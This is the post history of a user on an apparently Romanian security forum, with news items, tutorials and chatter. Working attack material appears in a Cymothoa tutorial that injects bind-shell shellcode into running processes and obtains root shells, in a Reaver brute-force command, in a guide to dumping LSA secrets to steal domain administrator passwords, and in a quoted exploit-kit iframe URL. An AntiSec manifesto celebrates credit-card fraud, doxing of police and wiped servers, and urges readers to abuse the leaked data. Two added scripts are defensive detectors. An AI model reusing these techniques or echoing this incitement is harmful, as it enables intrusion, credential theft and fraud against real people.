Everything posted by co4ie
-
Hacker's Demo Shows How Easily Credit Cards Can Be Read Through Clothes And Wallets

Pull out your credit card and flip it over. If the back is marked with the words “PayPass,” “Blink,” that triangle of nested arcs that serves as the universal symbol for wireless data or a few other obscure icons, Kristin Paget says it’s vulnerable to an uber-stealthy form of pickpocketing. As she showed on a Washington D.C. stage Saturday, she can read all the data she needs to make a fraudulent transaction off that card with just a few hundred dollars worth of equipment, and do it invisibly through your wallet, purse, or pocket.

At the Shmoocon hacker conference, Paget aimed to indisputably prove what hackers have long known and the payment card industry has repeatedly downplayed and denied: That RFID-enabled credit card data can be easily, cheaply, and undetectably stolen and used for fraudulent transactions. With a Vivotech RFID credit card reader she bought on eBay for $50, Paget wirelessly read a volunteer’s credit card onstage and obtained the card’s number and expiration date, along with the one-time CVV number used by contactless cards to authenticate payments. A second later, she used a $300 card-magnetizing tool to encode that data onto a blank card. And then, with a Square attachment for the iPhone that allows anyone to swipe a card and receive payments, she paid herself $15 of the volunteer’s money with the counterfeit card she’d just created. (She also handed the volunteer a twenty dollar bill, essentially selling the bill on stage for $15 to avoid any charges of illegal fraud.)

[Image: Paget magnetizing a counterfeit card with a volunteer's wirelessly-stolen credit card data on stage at Shmoocon.]

If anyone still doubted that the trick had worked, Paget accidentally flashed the volunteer’s credit card number on a screen in front of an audience of hundreds of hackers and security researchers. “You were planning on cancelling that card, weren’t you?” she added somewhat sheepishly.

Contactless cards are far more common than they might seem: According to the Smart Card Association, about 100 million of the RFID-enabled cards are in circulation. Visa calls its technology payWave, MasterCard dubs it PayPass, Discover brands it Zip, and American Express calls it ExpressPay. According to a show of hands among Shmoocon’s audience, dozens of the several hundred conference attendees in the room had contactless cards, and about a quarter of those weren’t aware of it until Paget asked them to pull out their cards and check for contactless symbols.

Paget, a well-known security researcher for the consultancy Recursion Ventures who was known as Christopher Paget until a gender change last May, used a simple method for her hack: impersonating a legitimate contactless point-of-sale terminal with her own RFID card reader. (That’s the striped panel pictured above.) In one practical version of the scam, Paget says, a fraudster could simply bump up against his victim with that reader in a coat pocket and invisibly scan the RFID signal through material like a leather wallet or cloth pants. In a demonstration just before her talk, Paget read a card in my wallet through my back pocket without touching me, successfully obtaining the card’s information.

The scheme, Paget points out, doesn’t involve any hidden bug in the system, but rather the more fundamental problem that any commercially-available RFID reader can read the data from a contactless card as easily as a store’s point-of-sale device does. “Whatever encryption or other security there might be, it doesn’t matter,” she says. “The reader just spits out the number as if I’m the point-of-sales terminal, which is totally stupid. This is an embarrassingly simple hack, but it works.”

The attack Paget demonstrated is far from new. The security industry has known since 2006 that contactless credit cards can be read wirelessly without the owner’s knowledge. But in current versions of the cards, the user’s name, PIN and the three-digit CVV on the back of the card aren’t included in the wirelessly-read information, which the industry has argued means the attack isn’t practical.

Randy Vanderhoof, executive director of the industry group the Smart Card Alliance, points out that despite previous research on the contactless attack, no real-world instances of the fraud have ever been reported. “We’ve got six years of history, a hundred million users of these cards, and we haven’t seen any documented cases of this kind of fraudulent transaction. The reason we think that’s the case is that it’s very difficult to monetize this as a criminal,” says Vanderhoof. “The premise that this is a new threat is absolutely false and isn’t supported by [Paget's] demonstration.”

In fact, contactless cards do offer one security feature traditional cards don’t: Along with the card’s 16-digit number and expiration date, the cards are set to offer up a one-time CVV code with every scan. Those codes can only be used for one transaction, and have to be used in the order they’re generated. If a payment processor detects multiple transactions with the same code or codes being used to make transactions in the wrong order, it will disable the card. So a contactless card scammer can only use each stolen number for one transaction, and if the victim of the scam uses the card again before the thief has time to make a fraudulent payment, all transactions on the card will be blocked.

But Paget says that rotating one-time CVV only means a fraudster would need to target multiple victims rather than defraud a single victim repeatedly. The scammer could stand in a crowded train station, for instance, reading the card numbers of many passers-by and sending them to an accomplice who carried out the rest of the scheme in real-time. “Instead of one person seeing many fraudulent transactions on their card, fifty people see one transaction on their statement, and maybe they don’t even notice it,” she says. “The card industry says this isn’t possible, but the information they’re giving you isn’t complete. I needed me to get up on stage and prove it so they would accept that the problems are real.”

And now how to solve those problems? Perhaps the simplest solution, Paget advises, is to kill your card’s RFID chip by frying it in the microwave. But that’s a more delicate task than it might seem. “Three seconds in the microwave will kill the chip,” she says. “Five seconds will set it on fire.”

[Image: Paget's Guardbunny, a credit-card-sized RFID jamming device]

Paget’s firm has been working on a more sophisticated fix: a credit-card-shaped protection device known as GuardBunny that sits in a wallet alongside payment cards and blocks any would-be RFID fraudster. Paget says the device, which remains a prototype and still has no roadmap for commercial sale, blocks RFID signals far more effectively than any currently-available RFID-shielding wallet.

Commercially-available RFID blockers simply shield cards or passports with a layer of aluminum or steel. Guardbunny, by contrast, reflects back the reader’s RFID signal with its own chip, effectively jamming the radio signal. That technique means even high-powered RFID readers would likely fail to pick up any credit card signals nearby. “It doesn’t matter how much power you put into it, it just bounces it back at you,” Paget says.

Better still, when Guardbunny detects an RFID reader’s signal, it emits a high-pitched whining sound and its bunny icon’s eyes glow (as pictured) to warn of possible contactless pickpockets.

Paget admits that certain high-level attacks could get around even the Guardbunny’s protections. “You can defeat this. But it involves building your own reader,” she says. “That’s a lot more to demand of the bad guys than spending $50 on eBay.”
-
A few days ago, hundreds of websites, based on WordPress 3.2.1, were compromised. The attacker uploaded an HTML page to the standard Uploads folder and that page redirects the user to the Phoenix Exploit Kit. Its logs show that users from at least four hundred compromised sites were redirected to Phoenix exploit pages. Here is a partial list of those websites:

[Image: Partial list of compromised WordPress websites]

The content uploaded by the attacker is not part of the home page and will not show when users browse these websites. In fact, accessing any page on these compromised WordPress sites, other than the uploaded page, will not infect the user’s machine. The general motivation of attackers to compromise websites is mainly to bypass URL reputation mechanisms, spam filters and certain security policies.

In order to lure users to these pages, the attacker sent thousands of malicious emails querying an unfamiliar bill and asking recipients to click on a link as described by Websense blog. The link points to the aforementioned uploaded page.

[Image: The malicious uploaded page]

The page is obfuscated and adds a hidden IFRAME that leads to the Phoenix Exploit Kit:

<IFRAME style="RIGHT: -8710px; WIDTH: 0px; POSITION: fixed; HEIGHT: 24px" src="hxxp://horoshovsebudet.ru:8801/html/yveveqduclirb1.php" frameborder="0"></IFRAME>

The exploit page is hosted in a Russian domain called horoshovsebudet which roughly translates as “Everything will be fine”, showing a certain sense of humor by these attackers.

The Phoenix Exploit Kit identifies the User Agent of the client machine and delivers a customized exploit Web page. The following obfuscated page was served when accessing with Internet Explorer 6:

[Image: The obfuscated Phoenix exploit page]

The obfuscated page above generates code which attempts exploiting multiple vulnerabilities in Microsoft Internet Explorer, Adobe PDF, Flash and Oracle Java as described in the Phoenix Exploit Kit blog. Among those exploits is the latest Java Rhino vulnerability as shown in the following screenshot and taken from the original malicious server.

[Image: Statistics on Phoenix Exploit Kit control panel]

Note the successful exploitation rate of the Java Rhino vulnerability and of the PDF Libtiff vulnerability. Even the MDAC vulnerability is successfully exploited which is surprising given that it only exists in the old version 6 of Internet Explorer.

Interestingly enough, the “Browser statistics” chart in the screen shot above shows that none of the victims used Google Chrome. Taking a closer look at the source code of the Phoenix Exploit Kit reveals that Chrome browser is explicitly excluded, for no obvious reason:

[Image: Phoenix Exploit Kit source code]

All M86 Secure Web Gateway customers are protected against this attack by default. The access to the exploit page is blocked.

As usual, stay safe and be careful not to click links in suspicious emails.

Source
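A site owner's check for the pattern the post describes, as an added example that is not part of the original post or the vendor write-up: it walks an uploads directory for HTML files and reports iframes that are zero-sized, hidden by CSS, pushed off-screen, or loaded from a non-standard port. The function names, the off-screen threshold and the sample markup (modelled on the IFRAME quoted above, with a placeholder host) are assumptions.

```python
import re
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlparse

OFFSCREEN_PX = -1000          # assumed threshold: offsets this negative are off-screen
_NUM = re.compile(r"^\s*(-?\d+(?:\.\d+)?)\s*(?:px)?\s*$")


def _style_map(style):
    """Split an inline style attribute into {property: value}, lower-cased."""
    props = {}
    for part in style.split(";"):
        name, sep, value = part.partition(":")
        if sep:
            props[name.strip().lower()] = value.strip().lower()
    return props


def _pixels(value):
    """Return a pixel length as float, or None for %, em, auto or empty values."""
    m = _NUM.match(value or "")
    return float(m.group(1)) if m else None


class IframeAuditor(HTMLParser):
    """Collect iframes whose attributes hide them from the visitor."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):   # tag and attribute names arrive lower-cased
        if tag != "iframe":
            return
        attr = {k: (v or "") for k, v in attrs}
        style = _style_map(attr.get("style", ""))
        reasons = []
        for dim in ("width", "height"):
            size = _pixels(style.get(dim, attr.get(dim, "")))
            if size is not None and size <= 1:
                reasons.append(f"{dim} {size:g}px")
        if style.get("display") == "none" or style.get("visibility") == "hidden":
            reasons.append("hidden by CSS")
        if style.get("position") in ("fixed", "absolute"):
            for edge in ("left", "right", "top", "bottom"):
                offset = _pixels(style.get(edge, ""))
                if offset is not None and offset <= OFFSCREEN_PX:
                    reasons.append(f"off-screen ({edge}: {offset:g}px)")
        try:
            port = urlparse(attr.get("src", "")).port
        except ValueError:                    # malformed port in the URL
            port = None
        if port not in (None, 80, 443):
            reasons.append(f"non-standard port {port}")
        if reasons:
            self.findings.append({"src": attr.get("src", ""), "reasons": reasons})


def scan_html(text):
    """Return the suspicious iframes found in one HTML document."""
    auditor = IframeAuditor()
    auditor.feed(text)
    auditor.close()
    return auditor.findings


def scan_uploads(root):
    """Map every .htm/.html file under root to its findings (possibly empty)."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in (".htm", ".html"):
            report[str(path)] = scan_html(path.read_text(errors="replace"))
    return report


# Constructed samples: the style values mirror the quoted IFRAME, the host is a placeholder.
SAMPLE_MALICIOUS = '''<html><body>
<p>Loading your invoice...</p>
<IFRAME style="RIGHT: -8710px; WIDTH: 0px; POSITION: fixed; HEIGHT: 24px"
 src="http://exploit-kit.example:8801/html/landing.php" frameborder="0"></IFRAME>
</body></html>'''
SAMPLE_BENIGN = ('<iframe width="560" height="315" '
                 'src="https://www.youtube.com/embed/VIDEO_ID" frameborder="0"></iframe>')

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_MALICIOUS):
        print(finding["src"], "->", "; ".join(finding["reasons"]))
```

`scan_uploads` lists every HTML file even when no iframe is flagged, because the page in the post builds its IFRAME from obfuscated script and a static scan will not see it; an HTML file in the uploads folder is worth reviewing on its own.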
-
@cifratorul: That's what we're here for ... now we know who's buying the first round at the next meetup :)) @Begood: Congratulations! You are a perfect example that if you study and work hard, the reward is not long in coming!!
-
Home-made parabolic wireless internet antenna 33dbi-2,4Ghz
co4ie replied to bruttus139's topic in Wireless Pentesting
OK ... thanks a lot, and I'm waiting for your reply! (By the way ... edit your post if you forgot to write something ... stop double-posting.) Thank you for clearing up the omni/directional question!! I decided on an omnidirectional one because the antenna will sit somewhere outside the window, perpendicular to the ground, and 20/25 m across the street there is a 10-storey block of flats (so a directional one is pretty much out of the question, the distance being too small to pick up over a wide angle, especially with a small reflector)! I'd like to make something like ... or another model ... I'll see what else I can find ... the main problem was with the Wi-Fi card I have ... I'll see how I solder the wires!! By the way ... I have an antenna from a car radio station ... since I won't be using the internet while driving (I want the antenna only for home, and it should be as "aesthetic" as possible), couldn't this one be used as the antenna, stuck onto the air conditioner as a reflector? And if so ... can I find an adapter from the antenna's connector to a uFL connector?
-
Home-made parabolic wireless internet antenna 33dbi-2,4Ghz
co4ie replied to bruttus139's topic in Wireless Pentesting
@bruttus139: OK ... As I told you, I'm not really good at electronics ... can you draw it for me as you would for a dummy (because in this field I practically am one)? What and where do I need to unsolder/solder/cut ... The uglier part is that the capacitors don't go through the board ... as you can see, and besides the fact that they are extremely small ... I think it would be impossible to solder anything next to them!! What I'd actually like is an omnidirectional antenna ... can you suggest a simpler and more reliable model? I live in Bucharest and there's no shortage of networks in the area ... but I'd really like to build something like this. I was thinking of a model like this: but I wouldn't want to leave the adapter outside at -20 °C
-
Are you all stupid? What the fuck do you have against the man? That's the political class ... that's all they know how to do, and it's a legacy from Ceasca and his lot ... do you think that if others had been there they wouldn't have done the same? If they hadn't cut salaries they would have raised taxes to 40% and it would have been the same shit!! They all steal ... they are all bastards ... and instead of choosing the lesser evil you shit yourselves ... because of course you're all experts in politics and football!! Go and fucking learn, you brats ... work honestly and I assure you that nobody and nothing will take what is yours, be it Basescu or Iliescu or some other idiot from the schoolyard!! By the way ... if he praises the Romanian "hackers" so much ... why the fuck did he allow ACTA to be signed? He didn't even put it up for public debate ...
-
Home-made parabolic wireless internet antenna 33dbi-2,4Ghz
co4ie replied to bruttus139's topic in Wireless Pentesting
I have a question too ... keeping in mind that I know ~nothing about electronics: I have a TP-Link TL-WN312G v4.1 USB adapter ... which looks like this: Where could I solder the wires that come from the antenna? It really will be a very nice project for next weekend, and I'd like to use this adapter because it's lying around the house unused and it's reasonably reliable!!
-
Install a custom ROM, root it, install JIT, install setCPU and overclock it, delete the apps you don't need, replace the home launcher with LauncherPro, install data2sd ... and that's about all I could recommend for now ... look here for more ideas ..
-
Inject Backdoor’s Shellcode Into An Existing Process

Cymothoa is a stealth backdooring tool that injects backdoor’s shellcode into an existing process. The tool uses the ptrace library (available on nearly all *nix) to manipulate processes and infect them.

root@Dis9Team:/pentest/backdoors/cymothoa# ./cymothoa -S
0 - bind /bin/sh to the provided port (requires -y)
1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <izik@tty64.org>
2 - bind /bin/sh to tcp port with password authentication (requires -y -o)
3 - /bin/sh connect back (requires -x, -y)
4 - tcp socket proxy (requires -x -y -r) - Russell Sanford (xort@tty64.org)
5 - script execution (requires -i -c), creates a tmp file in the process dir you must remove
6 - forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/
7 - serial port busybox binding - phar@stonedcoder.org mdavis@ioactive.com
8 - forkbomb (just for fun...) - Kris Katterjohn
9 - open cd-rom loop (follows /dev/cdrom symlink) - izik@tty64.org
10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs (pigspigs@yahoo.com)
root@Dis9Team:/pentest/backdoors/cymothoa#

root@Dis9Team:/pentest/backdoors/cymothoa# ps aux | grep /bin/bash
root 1236 0.0 0.2 4280 1376 tty1 S+ 09:22 0:00 /bin/bash /usr/bin/startx
root 1506 0.1 0.3 4648 1932 pts/1 S 09:22 0:00 /bin/bash
root 1554 0.0 0.1 3376 744 pts/1 S+ 09:26 0:00 grep --color=auto /bin/bash

root@Dis9Team:/pentest/backdoors/cymothoa# ./cymothoa -p 1506 -s 0 -y 10086
[+] attaching to process 1506
register info:
-----------------------------------------------------------
eax value: 0xfffffe00 ebx value: 0xffffffff
esp value: 0xbf940ae4 eip value: 0xb7818422
------------------------------------------------------------
[+] new esp: 0xbf940ae0
[+] injecting code into 0xb7819000
[+] copy general purpose registers
[+] detaching from 1506
[+] infected!!!
root@Dis9Team:/pentest/backdoors/cymothoa#

root@Dis9Team:/pentest/backdoors/cymothoa# nmap -p 10086 127.0.0.1
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-23 09:29 CST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00062s latency).
PORT STATE SERVICE
10086/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

root@Dis9Team:/pentest/backdoors/cymothoa# nc 127.0.0.1 10086
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/pentest/backdoors/cymothoa

root@Dis9Team:/pentest/backdoors/cymothoa# ./cymothoa -p 1 -s 2 -y 1002 -o 123456
[+] attaching to process 1
register info:
-----------------------------------------------------------
eax value: 0xfffffdfe ebx value: 0xa
esp value: 0xbfc0240c eip value: 0xb7856422
------------------------------------------------------------
[+] new esp: 0xbfc02408
[+] injecting code into 0xb7857000
[+] copy general purpose registers
[+] detaching from 1
[+] infected!!!

root@Dis9Team:/pentest/backdoors/cymothoa# nc 127.0.0.1 1002
Password: 123456

A very useful tool ... simple and to the point!!

Source
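What the session above looks like from the defender's side, as an added example that is not part of the original post or of the tool: after injection an ordinary process (here `bash` and `init`) suddenly owns a listening TCP socket, which a check over `ss -ltnp` output can flag. The sample output is constructed to mirror the PIDs and ports in the session; the baseline and the "never listens" list are assumed local policy.

```python
import re

# Assumed policy: programs that have no reason to own a listening TCP socket.
NEVER_LISTEN = {"sh", "bash", "dash", "zsh", "ksh", "init", "cron", "login"}

# Matches each ("name",pid=N,fd=M) entry in the users:(...) column of ss.
_OWNER = re.compile(r'\("([^"]+)",pid=(\d+),fd=\d+\)')


def parse_listeners(ss_output):
    """Return (address, port, process, pid) for every LISTEN row of `ss -ltnp`."""
    rows = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue                               # header or non-listening row
        addr, _, port = fields[3].rpartition(":")  # also handles [::]:22
        if not port.isdigit():
            continue
        # Without root, ss omits the owner column; report such sockets as "?".
        owners = _OWNER.findall(line) or [("?", "0")]
        for name, pid in owners:
            rows.append((addr, int(port), name, int(pid)))
    return rows


def audit_listeners(ss_output, baseline):
    """Compare listeners against a known-good set of (port, process) pairs."""
    alerts = []
    for _addr, port, name, pid in parse_listeners(ss_output):
        if name in NEVER_LISTEN:
            alerts.append((pid, name, port, "process type should never listen"))
        elif (port, name) not in baseline:
            alerts.append((pid, name, port, "listener not in baseline"))
    return alerts


# Constructed sample of `ss -ltnp` output; PIDs and ports follow the session above.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      0      0.0.0.0:10086      0.0.0.0:*         users:(("bash",pid=1506,fd=3))
LISTEN 0      0      0.0.0.0:1002       0.0.0.0:*         users:(("init",pid=1,fd=4))
LISTEN 0      100    127.0.0.1:5432     0.0.0.0:*         users:(("postgres",pid=990,fd=5))
"""
BASELINE = {(22, "sshd")}     # assumed known-good listeners for this host

if __name__ == "__main__":
    for pid, name, port, why in audit_listeners(SAMPLE_SS, BASELINE):
        print(f"pid {pid} ({name}) listening on tcp/{port}: {why}")
```

On kernels with the Yama LSM, setting `kernel.yama.ptrace_scope` to 3 disables ptrace attach altogether, which removes the mechanism this kind of injection depends on.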
-
Really great tutorial!! Complete and explained for everyone! Off-topic: Nytro ... 90% of the posts you make (news and tutorials) you make 1 minute before me :| ...
-
Welcome comrades around the world and thanks for joining us for our end of the year crime spree. 2011 is over and what a chaotic year it's been: brutal tyrants and inept dictators were overthrown while multinational corporations and lazy security contractors were systematically targeted for embarrassment and elimination. Was it the year of protests, occupations, revolutions? The year of the hacktivist? Looking back, we’re not quite sure what the hell it was, but we certainly had lots of laughs contributing to the mayhem by owning pretty much anything and everything we wanted to.

Did you enjoy looting and plundering the pocketbooks of the rich and powerful during Lulzxmas? Did you enjoy using and abusing the personal emails and passwords of feds and corporate executives? How about all those "Law Enforcement Sensitive" documents stolen from NY police chief emails? And that epic cslea.com defacement on New Year's Eve? Yes, many lulz were had during this past week, and rest easy fellow pirates, that was only a taste of the chaos to come.

We're ringing in the new year with another exciting #antisec zine release, and this is a big one. Lots of servers were rooted and rm'd. More than a few clueless sysadmins had their .bash_history and mail spools spilled. A lot of cops got doxed — shit, with all the live passwords being dropped here one could easily own police departments in nearly every U.S. state.

To match this truly epic hacking spree, we also had to go on an epic shopping spree. In an act of loving egalitarian criminality, we used company credit cards to make donations to dozens of charities and revolutionary organizations, including the Bradley Manning Support Organization, the EFF, the ACLU, CARE, American Red Cross, Amnesty International, Greenpeace, some commies, some prisoners, various occupations, and many more unnamed homies. It took weeks of hard work, but it paid off: to the tune of over $500,000 dollars liberated in total. Some examples we publicized were eventually returned: other payments made more discreetly were confirmed to have been received and changed to hard cash.

Of course, we had to engage in some pranks as well. What’s life without a little laughter at the expense of the 1%? We sent Pop-Tarts to the sysadmins with the hopes they would appreciate the humor. We also transferred to ourselves some form of anonymous currency that can't be traced or returned. Maybe we even sold or traded some of these cc dumps and password lists with other black hat comrades for botnets and 0days. Fuck em' if they can't take a joke!

While we attacked the institutions of capitalism, it would only make sense to attack those who enforce it, the inherently oppressive protectors of property and purveyors of social control; the pigs, the fuzz... the police. Do you remember a month ago when the mayors of over eighteen major cities in the U.S. collaborated with the swine to launch a coordinated attack on Occupation sites? The indiscriminate, and unprovoked, arrest and brutalization of thousands of protesters? We the 99% face an endless cycle of evictions and layoffs, while the powerful elite laugh all the way to the bank, comforted by their lucrative federal contracts and billion dollar bailouts. All our lives we have been robbed blind, and now it's time to start pointing our guns in the right direction.

In retaliation for this unprovoked, premeditated police-state brutality, we executed our own raid against New York and California police targets. And no, we will not be using pepper spray or tasers: we'll leave that for the boys in blue. Did you think we forgot? Did you think we would let you kick us out of our parks, teargas us, send veterans to the hospital, and conspire with other police forces to repress our uprising? We do not forgive, we do not forget: our vengeance will swallow you whole, and we will shit you out into a place more hellish than the prisons you fill.

On New Year's Eve, while our revolutionary comrades brought the noise to the front of jails across the world in support of the incarcerated, we were opening fire on the websites and emails of the 1%, publishing stolen information from police departments in both California and New York. From coast to coast we lulzed as we hit the top police chiefs: skimming their private email and Facebook accounts, blissfully abusing their internal law enforcement portals, and making off quick with their private documents which we then published on tor hidden services and BitTorrent. Finally, we defaced their websites and rm'd their servers, live on IRC and Twitter for the whole world to see.

While we attacked police targets, we also decided to go after their supply chain. We bring you the full story of how we gutted the military and law enforcement equipment supply store, SpecialForces.com. Truth be told, we had been keeping quiet about this particular target for a time while we lived large off its pillaged goods. However, just prior to this release, a former member leaked the cleartext password lists, and some media picked up on it. Now that the jig is up, the full story of this owning can be told. To top this target off, we threw in some credit cards and home address info to thousands of their mostly military and police customer base. Hope they don't mind. Just kidding.

We're calling upon all allied battle ships, all armies of darkness, to rise up and use and abuse all the personal information of these tyrannical agents and supporters of the 1%. You wanted lulz? With the sheer amount of passwords, credit cards, and mail spools we plastered all over the internet, you can guarantee that the richest and most powerful people will continue to get owned hard well into 2012.

You can find everything HERE
-
Reaver brute force attack Tool, Cracking WPA in 10 Hours
co4ie replied to co4ie's topic in Stiri securitate
Well ... the PoC will have to wait a bit longer ... I no longer have anything to run tests on, and the neighbours' routers either don't have WPS or Reaver can't authenticate with the AP ... I still have to test some more, or if you want you can test it yourselves!!
-
@demon_zone: Note that on 2 Feb there is a Dilated Peoples concert at Silver Church ....
-
Wi-Fi Protected Setup PIN brute force vulnerability
co4ie replied to Nytro's topic in Wireless Pentesting
And the tool has been released. Details
-
The WiFi Protected Setup protocol is vulnerable to a brute force attack that allows an attacker to recover an access point’s WPS pin, and subsequently the WPA/WPA2 passphrase, in just a matter of hours.

Reaver is a WPA attack tool developed by Tactical Network Solutions that exploits a protocol design flaw in WiFi Protected Setup (WPS). This vulnerability exposes a side-channel attack against Wi-Fi Protected Access (WPA) versions 1 and 2 allowing the extraction of the Pre-Shared Key (PSK) used to secure the network. With a well-chosen PSK, the WPA and WPA2 security protocols are assumed to be secure by a majority of the 802.11 security community.

Usage is simple: just specify the target BSSID and the monitor mode interface to use:

# reaver -i mon0 -b 00:01:02:03:04:05

Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations. On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.

WPS allows users to enter an 8 digit PIN to connect to a secured network without having to enter a passphrase. When a user supplies the correct PIN the access point essentially gives the user the WPA/WPA2 PSK that is needed to connect to the network. Reaver will determine an access point's PIN and then extract the PSK and give it to the attacker.

Get open source version of Reaver at Google Code

Source

I will make a video with a PoC of this method ... I hope it will be what we've all been waiting for!!
-
The Antisec wing of Anonymous revealed on Saturday that it had compromised the servers of the private intelligence firm Strategic Forecasting Inc. — allegedly seizing millions of internal documents and thousands of credit card numbers from the company, more commonly known as Stratfor.

That would be a major breach of private information from any firm. But this hack could prove particularly significant, because Stratfor serves as an information-gathering resource and open source intelligence analysis for both the U.S. military and for major corporations.

Antisec breached Stratfor’s networks several weeks ago, according to sources within the group that attacked the firm. On Saturday, Antisec began posting credit card details of a few Stratfor customers on Internet Relay Chats. But that’s just the start of a much larger data dump, the group claims. Anonymous is planning to release much more information — up to 200 gigabytes worth, in parts throughout the week leading up to New Year’s Eve. That trove allegedly includes 860,000 usernames, emails, and md5-hashed passwords; data from 75,000 credit cards, including security codes used for no card present transactions; and over 2.5 million Stratfor emails, internal Stratfor documents from the company’s intranet, and support tickets from it.stratfor.com.

“Four servers were rooted and wiped,” said one participant in the attack, “Charred like ashes, just like what we plan on doing with their old crumbling world.”

Stratfor’s website is currently down. But on its Facebook page, the company admitted that “an unauthorized party disclosed personally identifiable information and related credit card data of some of our members. We have reason to believe that your personal and credit card data could have been included in the information that was illegally obtained and disclosed.”

“We have also retained the services of a leading identity theft protection and monitoring service on behalf of the Stratfor members that have been impacted by these events,” the firm added.

According to Antisec, Stratfor was using the e-commerce suite Ubercart to handle customer information. The software has built-in encryption, but Stratfor apparently used custom modules that stored customer data in cleartext. Additionally Stratfor appears to have stored the card security code of its customers, a practice generally prohibited by credit card companies.

The first information to be released was a client list culled from Stratfor’s report subscribers, showing self reported employment data. Next was over 30,000 credit cards, accompanied by the announcement that they’d been used to ‘expropriate’ money from banks for charities via small dollar donations.

Anonymous participants estimated they had donated between $500,000 and $1,000,000 to charities fraudulently. They released screenshots of some of the charges, including to the Red Cross, Care, which fights poverty around the world, and the EFF.

While there’s no sign the cards have been used for personal gain, the op’s participants were unconcerned for the possibility that the charities themselves could be harmed. Said one: “I understood that that was could be a procedural consequence, but the credit card corporations have a choice, to either bite it themselves (poor them, with all their billion dollar bailouts), punish the client, or worst of all, punish the charities that have had nothing to do with this.”

There’s real possibility of damage to smaller organizations if the Anonymous donations result in massive chargebacks for fraud. For instance, the Appropriate Infrastructure Development Group (AIDG) which works on access to electricity, sanitation, and clean water tweeted earlier today: “Stratfor Global has us worried. Pls don’t donate to AIDG with stolen credit cards, we get hit $35 per fraudulent transaction! #anonymous RT”

According to Antisec participants, Stratfor was targeted because of its client list, which includes major companies and government entities, but also because it was terribly insecure. This may presage the future victims, as the group drifts away from picking targets for their humor value and easy hackability, and towards picking targets in line with their political goals.

“We believe police and employees who work for the most significant fortune 500 companies are the most responsible for perpetuating the machinery of capitalism and the state,” said one Antisec participant, “That there will be repercussions for when you choose to betray the people and side with the rich ruling classes.”

Antisec says that future Lulzxmas targets will include law enforcement groups and the companies that supply them.

Source
-
Dump Windows password hashes efficiently - Part 3

In the previous two posts of this series, I discussed how to dump Windows local users' password hashes (SAM) and Windows domain users' password hashes from domain controllers (ntds.dit).

When the password policy setting is configured to enforce password history, Windows stores a certain number of used passwords before an old password can be reused. The following screenshot shows you where this policy can be set.

Local Security Policy (secpol.msc) / Account Policies / Password Policy / Enforce password history

By default on workstations, this value is set to 0 and on domain controllers it is set to 24. This means that when dumping domain users' hashes from Active Directory's ntds.dit file, there is a high chance of also dumping the password history, allowing you, during the password cracking phase, to recognise patterns used by the target users. Despite not being current password hashes, pattern identification can lead to further attacks. For instance, ease of guessing passwords used against standalone services at later stages of your post-exploitation. Therefore, never underestimate the added value provided by dumping and cracking the password history.

Many of the tools introduced so far can dump the password history: Cain & Abel, PWDumpX among others. pwhist from Toolcrypt is also a valid option.

LSA secrets

LSA secrets is an area in the registry where Windows stores important information. This includes:

* Account passwords for services that are set to run by operating system users as opposed to Local System, Network Service and Local Service.
* Password used to logon to Windows if auto-logon is enabled or, generally, the password of the user logged to the console (DefaultPassword entry).

LSA secrets are stored in registry hive HKEY_LOCAL_MACHINE/Security/Policy/Secrets. Each secret has its own key. The parent key, HKEY_LOCAL_MACHINE/Security/Policy, contains the data necessary for accessing and decoding the secrets.

Dump LSA secrets

As per SAM hashes, the LSA secrets can be accessed by DLL injection into the lsass.exe process or from the registry files.

If you are Administrator and the target system is used in production, I recommend you choose the safe path and copy the registry files SYSTEM and SECURITY off the system: you can use the legacy registry hive copy (reg.exe/regedit.exe) or the volume shadow copies technique illustrated in the first post. Cain & Abel can extract LSA secrets from these files.

Alternatively, there are numerous tools that can be used to dump LSA secrets by injecting into the lsass.exe process: gsecdump has proved to be the most reliable for LSA secrets, working across all Windows versions and architectures. On 32-bit architecture, the original lsadump2 has proved to be good too. Despite my expectations, the two NirSoft tools (LSASecretsDump and LSASecretsView) have failed to dump services' account passwords, regardless of the architecture.

Regardless of the technique used, the passwords extracted are UTF-16 encoded. This means that they are in clear-text as opposed to SAM hashes. You can read a detailed description of the LSA secrets format here by moyix.

The following is the output of gsecdump on a server running IBM DB2 and PostgreSQL. Both database management systems run as Windows local users:

    C:\tools>gsecdump.exe -l
    aspnet_WP_PASSWORD
    [...]
    _SC_DB2
    74 00 65 00 73 00 74 00 70 00 61 00 73 00 73 00  t.e.s.t.p.a.s.s.
    testpass
    [...]
    _SC_postgresql-9.0
    74 00 65 00 73 00 74 00 70 00 61 00 73 00 73 00  t.e.s.t.p.a.s.s.
    testpass
    [...]

Threats posed by LSA secrets

Now, imagine that you have compromised a server that is part of a Windows domain and you have got a shell as Local System. If you want to extend your control over the network perimeter, one of the viable ways is to verify if any service runs as real operating system users and, if so, extract their clear-text password from LSA secrets.

You can run services.msc from Start / Run and sort the entries by the Log On As column to check this quickly. Obviously, the built-in sc.exe command can do the same, as well as other less known tools.

It is common to identify enterprise software like Veritas Netbackup, Microsoft SQL Server, Microsoft Exchange and others running as real users. More dangerously, sometimes system administrators opt to run services as domain users, if not domain administrators. This is clearly wrong and poses a high threat to the overall security of the target Windows domain because, as an attacker, you can dump the LSA secrets and use the clear-text domain administrator password to login to the root domain controller and take over the Windows network.

I have added these tools and improved the spread-sheet recently.

Source
